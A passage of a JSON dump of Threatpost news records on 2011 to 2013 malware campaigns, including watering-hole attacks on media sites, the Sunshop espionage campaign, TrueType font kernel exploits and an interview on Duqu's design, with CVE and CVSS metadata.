Radio, in addition to the Free Beacon website, have been compromised in attacks starting in early May. All of the attacks are similar in that malicious javascript is injected onto the site that redirects visitors to sites hosting more malware.\n\nGSN said its site was clean by late Monday.\n\nZscaler said the previous attacks on media sites were hosted at dynamic DNS providers and the attacks are triggered only when it detects the user is visiting via Internet Explorer. Zscaler also identified three other media sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.\n\nThe attacks were tagged watering hole attacks by experts; in watering hole attacks, sites of common interest to the target are infected and visitors are redirected to malware. Some watering hole attacks against government websites or human rights organizations have led to malware that monitors a user\u2019s activities online, while other attacks are financially motivated.\n", "cvss3": {}, "published": "2013-06-19T16:05:05", "type": "threatpost", "title": "65 Sites Compromised in ZeroAccess Trojan Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-1493", "CVE-2013-2423"], "modified": "2013-06-19T20:05:05", "id": "THREATPOST:77484EF7D9FBC087726C972CAA2EAD32", "href": "https://threatpost.com/malicious-ads-infect-65-websites-drop-zeroaccess-trojan/101028/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:49", "description": "Websites belonging to a number of Washington, D.C.-area media outlets have been compromised in a series of opportunistic attacks with criminals using a watering-hole tactic to spread scareware, or phony antivirus software.\n\nPopular D.C. radio station WTOP, sister station Federal News Radio, and the site of technology blogger John Dvorak, were infected with exploits targeting third-party Java or Adobe browser plug-ins. The exploits redirect site visitors to an exploit kit serving a scareware executable known as Amsecure.\n\nAs of Tuesday morning, WTOP was still serving malware. The source of the attacks on WTOP and Federal News Radio has not been determined, and it still could be that these are a jumping off point for a larger attack against Federal employees who frequent those sites as a D.C. news source. Media sites have been targeted with more frequency in recent months, and on a variety of levels. But for now, experts are not calling these targeted attacks.\n\n\u201cTypically with \u2018watering hole\u2019 style attacks, the threat actors are targeting a very specific group of users or organizations in order to implant malware (remote access Trojan) that allows for access to the victim\u2019s network (as we saw with the recent DoL compromise),\u201d said [Invincea](<http://www.invincea.com/2013/05/k-i-a-wtop-com-fednewsradio-and-dvorak-blog-site-serving-malware-media-sites-compromised-to-push-fake-av/>) in a statement provided to Threatpost. \u201cIn the case of these three sites which are obviously visited by a much larger audience and based on the type of malware observed (crimeware vs. RAT) our assumption is that a specific user group is more than likely not being targeted. Theft of online credentials and/or loss of additional PII is the likely goal of the attacker in these cases.\u201d\n\nZscaler, meanwhile, said [the three attacks shared another commonality](<http://research.zscaler.com/2013/05/popular-media-sites-involved-in-mass.html>): the attack sites were hosted at dynamic DNS providers and the attacks are triggered only when it detects the user is visiting via Internet Explorer. Zscaler also identified three media other sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.\n\nThe Dvorak site, meanwhile, may be offering up more clues on the attack than the other two. Invincea said it visited the site using Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. An admin for the Dvorak site posted a note that malware had been discovered in the site\u2019s wp-config.php file, which is the main configuration file for the WordPress content management system.\n\n\u201cGiven the amount of attention WordPress has received both recently and historically by miscreants seeking to hijack legitimate websites in order to drive user traffic to malware landing pages, this came as no surprise to us,\u201d Invincea security engineer Eddie Mitchell said.\n\nUpon landing on the Dvorak site, IE pulls a Java application from the attacker\u2019s site and connects to one of two malicious domains, registered to a Russian domain. The Amsecure malware is downloaded and a desktop shortcut is installed, called Internet Security 2013[.]ink.\n\nAmsecure is part of the Kazy malware family. Previous variants of the malware take over the desktop and display a warning screen indicating the computer has been infected along with a phony scanner tool that the attacker hopes will scare the user into buying the fake antivirus program.\n\nInvincea was also able to discover three exploits on the Dvorak landing page for Java and Adobe Reader: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. These exploits lead to landing page hosting the Black Hole exploit kit and the amsecure attacks.\n", "cvss3": {}, "published": "2013-05-07T12:58:12", "type": "threatpost", "title": "Hacked Media Sites Serving Fake AV Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "modified": "2013-05-09T20:01:56", "id": "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "href": "https://threatpost.com/d-c-media-sites-hacked-serving-fake-av/100268/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:40", "description": "**Update:** _Aaron Harison, president of the Center for American Freedom, told Threatpost this morning that the issue has been resolved and the site is no longer serving malware. _** **\n\nHackers have latched on to the NSA surveillance story\u2014literally.\n\nA news story on the outing of whistleblower Edward Snowden posted to the Washington Free Beacon is serving malware redirecting visitors to a malicious site where more malware awaits. The Free Beacon site remains infected, according to Invincea researchers, who said they have contacted the news organization about the attack. The story is being linked to by the popular Drudge Report and it\u2019s likely to have snared a pretty good number of victims so far.\n\nThe attack on the Free Beacon is similar to a previous [watering hole attack carried out against a number of other Washington, D.C.-based media outlets](<http://threatpost.com/d-c-media-sites-hacked-serving-fake-av/>), including radio station WTOP, Federal News Radio and the site of technology blogger John Dvorak. Invincea researcher Eddie Mitchell wrote on the company\u2019s blog that several other Free Beacon pages are also serving javascript, including the site\u2019s main index page. The javascript drops an iframe that sends traffic offsite to a page hosting the Fiesta Exploit Kit.\n\n\u201cThis exploit appears to be the same as used against other media sites to infect readers of these websites and part of a concerted campaign against media sites to infect their visitors by exploiting vulnerabilities in Java,\u201d Mitchell wrote. \u201c\n\nMitchell cautions that this attack isn\u2019t being detected yet by security companies because signatures associated with the attack are different from previous campaigns.\n\nThe Free Beacon attack is infecting users with the [ZeroAccess rootkit](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/>), as well as scareware. ZeroAccess is a virulent [peer-to-peer botnet](<http://threatpost.com/number-of-peer-to-peer-botnets-grows-5x/>) that has been folded into a number of commercial exploit kits including Blackhole. The malware makes an outbound communication requests to a number of command and control servers including e-zeeinternet[.]com, cinnamyn[.]com and twinkcam[.]net, from where the additional malware is loaded onto victim machines.\n\nA little more than a month ago, the campaigns against WTOP and sister station Federal News Radio were discovered. The exploits targeted Java and Adobe plug-ins and were used to spread scareware. Content on both stations is heavily political and the attacks could have been a jumping off point for a larger attack against federal employees who use the site as a resource. Unlike other watering hole attacks that lead to espionage campaigns against activists or political leaders, this one was serving malware usually associated with the cybercrime.\n\nThe Dvorak site was also attacked a month ago and malware was discovered on the site\u2019s [WordPress configuration files](<http://threatpost.com/hackers-using-brute-force-attacks-harvest-wordpress-sites-041513/>). Invincea said at the time that it used Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. The browser was pulling a Java app from the attacker\u2019s site and connecting to one of two Russian domains downloading Amsecure malware, which is part of the Kazy malware family, which is known for ransomware and scareware attacks. Three Java and Reader exploits were discovered on the Dvorak site: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. These exploits lead to landing page hosting the Black Hole exploit kit and the Amsecure attacks.\n", "cvss3": {}, "published": "2013-06-10T16:17:14", "type": "threatpost", "title": "Free Beacon Article Redirects to ZeroAccess Rootkit, Fake AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "modified": "2013-06-12T16:59:18", "id": "THREATPOST:988117842525F1F414002817E6166A11", "href": "https://threatpost.com/nsa-whistleblower-article-redirects-to-malware/100930/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:45", "description": "Lady Boyle seems to have an admirer.\n\nMalware named after a character in the Dishonored video game continues to pop up in targeted attacks against a number of high profile military and socially motivated websites. The latest surfaced about 10 days ago in an attack researchers at FireEye are calling the Sunshop Campaign.\n\nSunshop targeted a number of Korean military and political strategy websites, as well as a Uyghur forum among others with a pair of Java exploits and the recently [patched IE 8 vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms13-038>) recently used against the U.S. Department of Labor and a number of other sites. The exploits were redirecting vulnerable visitors to sunshop[.]com[.]tw where a host of malware awaits including Lady Boyle, which has been deployed in other [attacks against the Uyghur](<https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&ved=0CFcQFjAF&url=http%3A%2F%2Fthreatpost.com%2Fmalware-arsenal-targets-tibetan-activists-040213%2F&ei=V7ybUZhgq7PRAdzagfAD&usg=AFQjCNGKZ8xrkJiBv_H9dqZlQdevNV6PgQ&sig2=E2KLpJnzNz4LttVm7aPl_A&bvm=bv.46865395,d.dmQ>), in particular, and in the [Winnti attacks](<http://threatpost.com/stolen-winnti-certificates-used-watering-hole-attack-against-tibet-orphans-site-041213/>).\n\n\u201cA number of different Chinese-based espionage threat attackers use that malware, so it\u2019s hard to use that indicator alone as a tie it to one particular threat actor,\u201d said Ned Moran, a researcher at FireEye. \u201cAt least 5 different groups are using that malware. It\u2019s a popular tool used by intrusion actors.\n\n\u201cBased on the sites compromised, there was a clear focus on Korean security and defense related issues,\u201d Moran said. \u201cThe attackers are looking for data around the Korean defense posture.\u201d\n\nThe group behind Sunshop was also behind a 2010 attack on the Nobel Prize website that took advantage of a zero-day in Firefox, FireEye said.\n\nThese attacks can be considered watering hole attacks since all the sites are popular with influential targets and have javascript exploits that redirect victims to espionage-type malware.\n\n\u201cThese sites are well trafficked and the attackers have a strong sense of the audiences of these sites,\u201d Moran said. \u201cThey compromise the sites and wait for traffic to come to them.\u201d\n\nThe Lady Boyle malware, which is a remote access Trojan, is being served from three different command and control servers in the Sunshop attacks. IE8 users who land on the compromised site are hit with an exploit for [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>) pulled in from hk[.]sz181[.]com connected to a C&C server at dns[.]homesvr[.]tk. The two Java exploits, meanwhile, exploit [CVE-2013-2423](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2423>) and [CVE-2013-1493](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493>), both of which have been patched. All of the command and control servers, FireEye said, resolved to 58[.]64[.]205[.]53, used by another domain used to drop Briba malware, also known as the [IExplore RAT](<https://citizenlab.org/wp-content/uploads/2012/09/IEXPL0RE_RAT.pdf>) targeting NGOs.\n\n\u201cThis is a traditional RAT type of malware that provides access to a machine, runs commands, downloads victim data or uploads new executables to the victim, or runs shell commands,\u201d Moran said. In our experience, we have not seen it used outside this small set of intrusion actors; it\u2019s not commercially available. Whenever see it, tends show up in these types attacks, strategic espionage attacks.\u201d\n\nFireEye researchers also discovered a connection between the Sunshop[.]com[.]tw host and the PoisonIvy RAT used in a number of other targeted attacks.\n\n\u201cThat was the first time [Sunshop] was used as an exploit server; it\u2019s been in play for a few months,\u201d Moran said.\n", "cvss3": {}, "published": "2013-05-21T14:40:44", "type": "threatpost", "title": "IE 8 0Day in Sunshop Targeted Espionage Malware Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-1347", "CVE-2013-1493", "CVE-2013-2423"], "modified": "2013-05-23T18:36:13", "id": "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C", "href": "https://threatpost.com/ie-8-zero-day-pops-up-in-targeted-attacks-against-korean-military-sites/100728/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:30", "description": "Font-parsing vulnerabilities weren\u2019t part of the security consciousness much until the discovery of [Duqu](<http://threatpost.com/mystery-duqu-102011>) at the end of 2011. The spy malware hooked into the Windows kernel through bugs in the TrueType font file parsing engine, and not only breathed new life into the concept of cyber espionage, but helped rejuvenate an interest in kernel-level vulnerabilities and exploits.\n\nAlready this year, there have been successful [sandbox bypasses leading to kernel compromises](<http://threatpost.com/using-kernel-exploits-bypass-sandboxes-fun-and-profit-031813/>) demonstrated at Pwn2Own and Black Hat EU. And every single Patch Tuesday release from Microsoft going back to last October has included patches for kernel bugs, including some being actively exploited in the wild. [The July Patch Tuesday updates](<http://threatpost.com/critical-truetype-font-parsing-vulnerabilities-addressed-in-patch-tuesday-updates/101232>) released this week were particularly noteworthy with three separate bulletins addressing vulnerabilities in seven different Microsoft products affected by the same [TrueType font flaw](<http://www.securelist.com/en/blog/9102/Microsoft_Updates_July_2013_Serious_flaws_in_IE_DirectShow_and_Multiple_TrueType_Font_Handling_Code_Paths>).\n\nThis dynamic seems to bust the myth that attackers are solely interested in Web-based vulnerabilities and attacks against Java or Adobe bugs. Kernel attacks may be difficult, but they deliver hackers what they covet most: root access to computers, complete system compromises, and the ability to remotely inject code on a whim. And let\u2019s not forget that kernel-based attacks are starting to go mainstream, given the fact that [the Duqu exploit has been folded into the Blackhole and Cool exploit kits](<http://malware.dontneedcoffee.com/2012/10/newcoolek.html>), even though most of these vulnerabilities, the [Duqu vulnernability](<http://threatpost.com/microsoft-patches-windows-flaw-exploited-duqu-121311/$post_id%25/>) included, have been patched.\n\nWhite hats\u2014and criminals\u2014have been paying particularly close attention to the TrueType font file exploits. Attacks like these are executed via an embedded malicious font file dropped into an Office document, such as a Word file. Once the user opens the malicious file\u2014delivered either via a spear phishing email or over the Web\u2014the exploit targets a [vulnerability in kernel -mode drivers that improperly handle malicious TrueType font files](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3402>).\n\n\u201cTrueType font parsing is complicated and often maintains nested code. Its handling exercises code paths that expose both user-land and kernel mode vulnerabilities,\u201d said Kurt Baumgartner, principal security researcher at Kaspersky Lab. \u201cOn the Windows platform, much of the same code is maintained across versions of the OS. So the same vulnerability can be exploited across every version of the platform, although the exploit may need to be somewhat adapted to each OS version.\u201d\n\nThree July Patch Tuesday bulletins\u2014[MS13-052](<https://technet.microsoft.com/en-us/security/bulletin/ms13-052>), [M13-053](<https://technet.microsoft.com/en-us/security/bulletin/ms13-053>) and [MS13-054](<https://technet.microsoft.com/en-us/security/bulletin/ms13-054>)\u2014illustrate this point. Vulnerabilities in Microsoft Office, Lync, Visual Studio, .NET, Silverlight, and Windows components such as GDI+ were patched in relation to the TrueType flaw.\n\n\u201cTrueType vulnerabilities are difficult to exploit. But once they are, the exploits themselves can be reliable and difficult for antimalware solutions to handle,\u201d Baumgartner said. \u201cEven though the code abused by a TrueType exploit resides in the kernel, this portion of the kernel is different from and much less active than trying to deliver bits to highly active code handling network traffic, for example.\u201d\n\nThe fact that Microsoft has been patching kernel bugs with greater frequency could indicate a spike in hacker interest, TrueType- and OpenType-based are particularly attractive because they don\u2019t require user permission to interact with the core of the OS.\n\n\u201cRegarding TrueType Font (TTF) based attacks, it is important to note that not all TTF processing takes place in kernel-space. Depending on what vector is used to provide a crafted TTF, an attacker may get SYSTEM access or may just get access in the context of the affected process,\u201d said Craig Young, security researcher at Tripwire.\n\nAn exploit against the GDI+ vulnerability patched this week in MS13-054, Young said, would provide such kernel-space compromise of the system. Others, however, expose only the user-mode font processing and would not lead to complete system compromise.\n\n\u201cTrueType and OpenType font based attacks are definitely part of the mainstream attacker toolkit. These types of font files contain tables of data describing the curves as well as instructions which must be interpreted when rendering text,\u201d Young said. \u201cThis complexity makes it possible to have nice looking typesets but it also makes fonts very attractive to attackers due to the large attack surface and kernel involvement.\u201d\n\n\u201cCreating an exploit capable of reliable code execution on a modern operating system is always difficult but researchers and attackers have certainly had great success in doing so with various crafted fonts,\u201d Young added. \u201cOnce the crafted font has been developed, it is very easy to compromise victims by getting them to visit a web site or open a document. This technique can be quite effective as fonts are commonly rendered without asking user permission. It is a vector which lends itself very well to the spear-phishing and watering-hole techniques employed by APT as well as organized crime syndicates.\u201d\n\nIt\u2019s certainly true for white hats; Rahul Kashyap, chief security architect at virtualization security company Bromium told Threatpost in March that he and fellow research Rafal Wojtczuk followed Duqu\u2019s lead in exploiting TrueType vulnerabilities to access and own the kernel. They demonstrated at Black Hat EU how to use a commercial Windows-based sandbox called Sandboxie, which interfaces with the kernel in order for arbitrary code to run properly, to pull off a system compromise. With fonts, for example, Kashyap said a kernel call has to be made from the sandbox to the kernel; the sandbox has to allow the call to pass in order for, in this case, the font to render properly.\n\n\u201cDuqu exploited this vulnerability in font parsing to compromise the host. All of these kernel interfaces are bypassable by Duqu,\u201d Kashyap said. \u201cUsing several exploits for bugs in the way calls are handled by the kernel, it was easy to get a blue screen.\u201d\n\nThe trick is in the fact that the sandbox doesn\u2019t intercept font parsing calls to the kernel for performance reasons and the fonts would not be processed properly, he said.\n\n\u201cThere is a lot of exposure from the OS kernel that people don\u2019t realize,\u201d he said. \u201cThe moment you compromise the kernel, you have the same privileges as the kernel. You can disable the sandbox, access other programs and data and breach everything out there. With most Java exploits, for example, you still have to do privilege escalation. With the kernel, this is the worst-case scenario.\u201d\n", "cvss3": {}, "published": "2013-07-11T14:10:56", "type": "threatpost", "title": "TrueType Font Exploits Gateway to Kernel Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2013-07-15T20:14:36", "id": "THREATPOST:770B6E17E4B8181D31E215933E54652B", "href": "https://threatpost.com/of-truetype-font-vulnerabilities-and-the-windows-kernel/101263/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:21", "description": "[Stuxnet](<https://threatpost.com/stuxnet-authors-made-several-basic-errors-011811/>) has become the bogeyman of Internt security and cyberwar, showing up in marketing pitches, PowerPoint presentations and press releases from Washington to Silicon Valley to Tehran. But while Stuxnet has been garnering headlines for more than a year now, the far more serious threat in terms of ![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064817/costin_raiu_2.thumbnail_01.jpg)potential long-term damage has turned out to be [Duqu](<https://threatpost.com/anatomy-duqu-attacks-112111/>). The malware first came to light in September, but it may have been circulating four or five months before that. Its customizable, modular architecture has been a challenge for researchers seeking to understand its operation and its creators\u2019 intentions. Threatpost editor Dennis Fisher spoke with Costin Raiu, one of the main researchers working on Duqu at Kaspersky Lab, about the relationship between Stuxnet and Duqu, the possible identity of the attackers and the investigation into its architecture.\n\n**Dennis Fisher**: So, let\u2019s try and start at the beginning here. Duqu first sort of popped up a few weeks ago. How exactly was it found? And how did it initially start getting connected to Stuxnet? \n****\n\n**Costin Raiu**: Right. Okay, so, to be honest, the first reports of Duqu came up in September actually, not October. And we heard about it in a very interesting way. A colleague working for another company sent us a binary, and we searched for the MD5 of that binary on the Internet. So, we found a very interesting weblog page which was apparently maintained by a Hungarian researcher. And he was saying something like, \u201cLooking for friends or foes of this specific MD5 to talk about it.\u201d So, we thought it was very curious, very interesting. We looked at the binary. And the binary itself was interesting. First of all, there was, like, no Internet connection whatsoever. So, the only thing which the binary was doing when called with a special parameter called XXX. So, if you have executed this binary without putting the XXX parameter, then nothing happens. But, if you invoke it with this specific marker, then interesting things happen such as intercepting keystrokes, taking captures of the screen, dumping the configuration of your computer. And all this basically happens in background.\n\nAnd also, data is written to a file in your temporary folder. And this file, first of all, it is compressed. And it collects all this information. So, basically, it grows bigger and bigger and bigger. And this file has a very interesting name which is the tilde character and then DQ and then a number dot TMP.\n\nSo, basically, we observed this this specific Trojan, which we received back in September, it was collecting all sorts of information from your system and dumping it into this file, but not sending it anywhere. So, that was very, very interesting. Why would anybody write a Trojan which steals information but doesn\u2019t send it anywhere? \n****\n\n**Dennis Fishe**r: Right? \n****\n\n**Costin Raiu**: So, that seemed very odd to us. And to be honest, we didn\u2019t think it was really important or anything special simply because it didn\u2019t seem to do anything malicious except collect information about your system in a local file. \n****\n\n**Dennis Fisher**: And so, after that, a deeper analysis sort of uncovered the fact that that was only one component of the malware, right? \n****\n\n**Costin Raiu**: Right. So, later \u2013 basically, one month later, there was a public news about the Duqu and the fact that there were multiple components. And the file which we received in September was just one of the modules of this sophisticated hacking toolkit. So, then you understand that the way Duqu was written is to make it very hard to detect. Every single component by itself could be meaningless. But when you put them together, basically, interesting things start to happen.\n\nSo, this Trojan, the info stealer \u2013 the so-called \u201cinfo stealer\u201d component \u2013 which collects information from your system, does not get installed in the initial attack. So, you get infected with Duqu, and this only happens through a targeted attack. So \u2013 and by the way, I think it\u2019s very important to point out that if you got infected with Duqu, and if you\u2019re listening to us right now, then the first thing that you should know that you\u2019re probably part of a very, very limited number of people in the world. You\u2019re part of an elite, so to say, which had the privilege and the \u2013 okay \u2013 bad luck of getting infected with this sophisticated cyber espionage tool. \n****\n\n**Dennis Fisher**: So, you should feel special. \n****\n\n**Costin Raiu**: Absolutely. Actually, we pretty much think that every single victim of Duqu is special from a specific point of view, which we cannot disclose for obvious reasons. \n****\n\n**Dennis Fisher**: Yeah. \n****\n\n**Costin Raiu**: But I hope that, actually, we will be able to tell it at some point in time. And basically, when you get infected with Duqu, it\u2019s simple, let\u2019s say, the basic infrastructure. And then it connects to a command-and-control center which is hardcoded into its configuration files, and it begins \u2013 it starts to receive new modules like the info stealer. And the info stealer, as I was saying, it doesn\u2019t do many suspicious things except, okay, intercepting keyboard or, like, making screenshots. But, the file is stored to disk. So, the other, let\u2019s say, components, basically, the Duqu infrastructure is responsible for transferring the file from your disk to the command-and-control center and from there to the attacker.\n\nAnd I guess, it\u2019s also important to point out that, due to the way the Duqu, let\u2019s say, infrastructure has been designed, they created it in such a way that they leave as little footprints, fingerprints, as possible. So, dynamic process injection, no temporary files, no \u2013 especially for executables and modules no temporary files are created. So, they get the module from the command-and-control, and they inject it directly into another process without creating any temporary files, and they launch the code there. So, very, very careful, I think, they\u2019re very careful to make sure that these parts, these modules of Duqu, do not get left behind and they do not get discovered. \n****\n\n**Dennis Fisher**: Okay. It appears that they\u2019re using not only a different command-and-control for just about every attack, but they\u2019re creating separate drivers and different files for each target that they\u2019re going after. Is that the way it\u2019s working? \n****\n\n**Costin Raiu**: Yes. And this is \u2013 well, basically, this is all related to the encryption which is employed in Duqu. So, it\u2019s a \u2013 if you\u2019re familiar with the nesting dolls, the Russian matryoshkas, we can pretty much say the same. So, basically, you get a Word document by e-mail. And this Word document contains the exploit for the CVE-2011-3402 vulnerability.\n\nAnd the \u2013 inside the Word document, there is an embedded TrueType font file. The embedded TrueType font file which contains the exploit for this vulnerability, basically, inside this TrueType font file, the exploit is encrypted. So, the exploit decrypts itself in memory, does a number \u2013 a couple of checks, and then it fires up a loader.\n\nSo, basically, at every single point, they make sure that they delete whatever steps happened before, and they transfer control to the next module. And there are a number of different drivers and different modules which are responsible for extracting the Duqu components to disk. And basically, there are three files which get created on disk. There is one SYS driver file. There is a small PNF file, a configuration file. There is a big PNF file, so the extension is .PNF. And by the way, Stuxnet used the same extensions and this kind of similar mechanism to infect computers and install \u2013 basically, to install itself in computers. \n****\n\n**Dennis Fisher**: Okay. \n****\n\n**Costin Raiu**: So, yet another thing which is similar between Duqu and Stuxnet. And the reason why they\u2019re using unique \u2013 kind of unique sets for each target, I guess they also use different encryption, so this makes it harder to detect. Imagine that you add detection for one specific version of the toolkit without knowing that there are other victims. All the other victims, basically, they all have sets encrypted with different keys. So, it\u2019s very tailored. It\u2019s very, very targeted. And as I was saying, not just the encryption is different, but almost in every single case, they use a different command-and-control center. \n****\n\n**Dennis Fisher**: Which makes it, obviously, harder to backtrack to the CnC servers. And I know that one was taken down in India, and some others have been identified, but that\u2019s after the fact, right? It\u2019s after the targets have already been compromised. \n****\n\n**Costin Raiu**: Yeah, absolutely. And well, as far as I know, there is only one \u2013 just one organization in the world which has the chance to see and kind of to play with a live Duqu command-and-control center, and that was the Hungarian research lab CrySyS. So, they had a couple of days during which they could play with the command-and-control in India, this one that you mentioned. And according to their research, this server was up for a kind of long time. So, for some specific reason, they kind of prefer this command-and-control server in India.\n\nBut as you were saying, we\u2019re also aware of other command-and-control center which Duqu used. And actually, at the moment, we are kind of looking into this issue very, very deeply, so to say. Probably, I guess the number of command-and-control centers should be close to a dozen, I guess. \n****\n\n**Dennis Fisher**: Can you estimate the number of infections that you know about at this point? Can you give us a range, like, between 1 and 100? \n****\n\n**Costin Raiu**: Yes. I would suspect less than 50. \n****\n\n**Dennis Fisher**: Wow. \n****\n\n**Costin Raiu**: Of course, I may be wrong, but this is what I suspect \u2013 somewhere less than 50 infections around the world. So, very, very, very small number, actually, and very, very specific targets. \n****\n\n**Dennis Fisher**: And you mention that there\u2019s \u2013 it took a while to figure out the complete picture of what Duqu was doing, because at first you just saw the info stealer component, and then you started seeing these other components. Are you confident at this point that you\u2019ve found all of the components of at least the one specific version of Duqu? \n****\n\n**Costin Raiu**: No, definitely not. \n****\n\n**Dennis Fisher**: Okay. \n****\n\n**Costin Raiu**: So, actually, I\u2019m sure of the opposite. I\u2019m sure that we haven\u2019t seen all the single components. And basically, we are aware of only two different info stealer components. One of them is the original one that was located by CrySyS, and it\u2019s a very, very strange case and a big question mark for everybody what happened in that case. So, on the machine where they found this file on disk, and remember that I said that they do not create these files on disk. Instead, they run them directly from memory. \nBut, what I think that happened here is the following. Basically, if you download the modules from the command-and-control server and you run them dynamically, then the next time the system is rebooted, they lose the ability to intercept what\u2019s going on. And for probably for very high profile targets, they need this capability. They need this persistence. So, they need to be able to continue to sniff passwords and to make screenshots and to steal files even after reboot, so they need to survive after reboots.\n\nAnd I suspect that in that case they dumped the info stealer component to disk and choose \u2013 forced it to execute every time they needed it or on every boot. So, I think this could be one explanation, because the other info stealer that we are aware of that was intercepted on 18th of October, that one was never written to disk. So, it was, basically, sniffed from the network traffic. \n****\n\n**Dennis Fisher**: Wow. \n****\n\n**Costin Raiu**: And how do I know that actually there are more info stealer components? Basically, it\u2019s easy. The info stealer component that we have creates files, as I was saying, with the DQ name. But, we have also been able to identify compromised, like infected, customers which had files, now not just DQ files, but also DF files and DO files. And these are very interesting, particularly the DF files, because the DF files, they are a bit different from the DQ files from the point of view that they have documents inside.\n\nSo, they must have been created by a specific version of the info stealer which was collecting documents from disk, documents such as Word files, Excel files, source codes, AutoCAD documents and so on. And this specific version which creates the DF files and steals documents, we do not have. And this probably exist at the \u2013 I \u2013 we suspect that it existed somewhere around April, May, June. But later, it kind of disappeared, so the guys behind Duqu stopped using it. \n****\n\n**Dennis Fisher**: So, for one reason or another, they moved onto a different tactic? \n****\n\n**Costin Raiu**: Yeah, they removed this functionality from the info stealer. \n****\n\n**Dennis Fisher**: So, that\u2019s a fairly good indication that they\u2019re obviously paying attention to what\u2019s going on, and they\u2019re adjusting as they go along for each specific target that they\u2019re interested in. \n****\n\n**Costin Raiu**: Absolutely.\n\n_This is part one of an edited transcript of a [podcast with Costin Raiu](<https://threatpost.com/costin-raiu-duqu-stuxnet-and-targeted-attacks-111611/>). The second part will run tomorrow._\n", "cvss3": {}, "published": "2011-11-21T15:51:38", "type": "threatpost", "title": "Anatomy of the Duqu Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2018-08-15T10:10:52", "id": "THREATPOST:A16EDEF0DAAD6325A7D930BE82C2B01C", "href": "https://threatpost.com/anatomy-duqu-attacks-112111/75916/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:29", "description": "A few months after the hysteria around Stuxnet had died down, officials in Iran announced in April that some sensitive systems in the government\u2019s networks had been attacked by a [new piece of malware, known then as Stars](<https://threatpost.com/new-stars-malware-said-target-iran-042511/>). It now appears that attack was, in fact, the first appearance of an early version of [Duqu](<https://threatpost.com/duqu-installer-contains-windows-kernel-zero-day-110111/>), the most recent in a line of sophisticated attack tools that experts say have been designed to take out specific targets in a variety of sensitive networks.\n\nAn [analysis of the April attack](<http://www.securelist.com/en/blog/208193211/Duqu_First_Spotted_as_Stars_Malware_in_Iran>) shows that some of the machines that were infected by Stars were compromised using the same Windows kernel vulnerability that\u2019s contained in the Duqu installer. That flaw was unknown publicly until this week when information on the vulnerability emerged, which Microsoft later confirmed. The company has released a workaround for the bug, which is in the TrueType font parsing engine, and says it is working on a permanent patch for it, as well.\n\nSome of the targets of Duqu have been compromised using malicious Word documents containing exploit code for the TrueType bug, which is [CVE-2011-3402](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3402>). Researchers have not yet discovered a spreading mechanism for Duqu, if there is one, and it appears at the moment that the malware is being used only for attacks against carefully selected targets in a small number of countries. Among the countries in which infections have been confirmed are Sudan and Iran. Because Duqu is using a Windows kernel vulnerability as its infection method, it does not seem that the attackers are going after control systems at nuclear facilities, as Stuxnet did, but rather are likely going after PCs in key places.\n\nResearchers have found that Duqu has an architecture that is different from Stuxnet\u2019s, although the two tools do share some code-level similarities. [Duqu appears to be a customizable attack framework](<https://threatpost.com/stars-attack-iran-was-early-version-duqu-110511/>) that can be modified for any number of purposes by the individual attacker, and researchers have discovered that many known infected machines contained drivers for Duqu that were unique and not shared by other infected PCs. \n", "cvss3": {}, "published": "2011-11-05T21:08:37", "type": "threatpost", "title": "Stars Attack on Iran Was Early Version of Duqu", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2013-04-17T16:33:24", "id": "THREATPOST:7A66D3AC7210BC6168B3777DC0419A88", "href": "https://threatpost.com/stars-attack-iran-was-early-version-duqu-110511/75857/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:08", "description": "![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065636/windowssmall.jpg)Microsoft released seven bulletins fixing 23 vulnerabilities in 